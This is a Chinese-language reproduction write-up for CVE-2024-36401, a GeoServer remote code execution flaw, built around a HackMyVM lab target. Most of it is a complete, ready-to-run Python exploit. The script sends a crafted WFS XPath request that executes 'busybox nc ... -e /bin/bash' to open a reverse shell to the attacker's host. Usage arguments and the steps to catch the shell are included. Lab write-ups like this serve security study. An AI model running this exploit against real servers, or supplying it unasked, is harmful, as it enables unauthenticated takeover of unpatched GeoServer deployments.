CVE-2024-36401复现

一.漏洞概述

CVE-2024-36401 是 GeoServer 中的一个严重级远程代码执行漏洞（CVSS 9.8），允许未经身份验证的远程攻击者在服务器上执行任意代码。该漏洞源于 GeoServer 调用的 GeoTools 库 API 在评估 XPath 表达式时存在不安全处理，导致攻击者可以通过构造特制的请求执行任意代码。

影响版本

安全版本：2.23.6、2.24.4、2.25.2 及以上

二.环境搭建

直接用hackmyvm上的靶机

https://hackmyvm.eu/machines/machine.php?vm=Victorique

目标网站

搓一个py代码

import requests import argparse def send_request(_target,_port,_ip,_myport): if _port: target = f"{_target}:{_port}" url = f"http://{target}/geoserver/wfs" else: target = f"{_target}" url = f"http://{target}/geoserver/wfs" headers = { "Host": target, "Content-Type": "application/xml", } payload = f""" <wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0' valueReference='exec(java.lang.Runtime.getRuntime(),"busybox nc {_ip} {_myport} -e /bin/bash")' > <wfs:Query typeNames='sf:archsites'/> </wfs:GetPropertyValue> """ try: response = requests.post(url, headers=headers, data=payload, timeout=30, verify=False) if response.status_code in [401, 404, 403]: print("エラー") exit() else: print("成功") except requests.exceptions.RequestException as e: print('error', f"An error occurred: {e}") print('error', "Failed to send request!") def main(): parser = argparse.ArgumentParser(description='CVE-2024-36401') parser.add_argument('--target', required=True, help='ターゲットのホスト名を入力してください 例:http://example.com') parser.add_argument('--target_port', required=True, help='ターゲットのport番号入力してください 例:8080') parser.add_argument('--myip', required=True, help='自分のIPを入力してください 例:10.10.10.12') parser.add_argument('--myport', required=True, help='自分の待ち受けポート番号を入力してください 例:9000') args = parser.parse_args() target = args.target port = args.target_port ip= args.myip myport = args.myport send_request(target,port,ip,myport) if __name__ == "__main__": main()

使用参数

python CVE-2024-36401.py --target example.com --target_port 8080 --myip 172.26.16.100 --myport 9000

三.攻击复现

监听

运行代码

拿到shell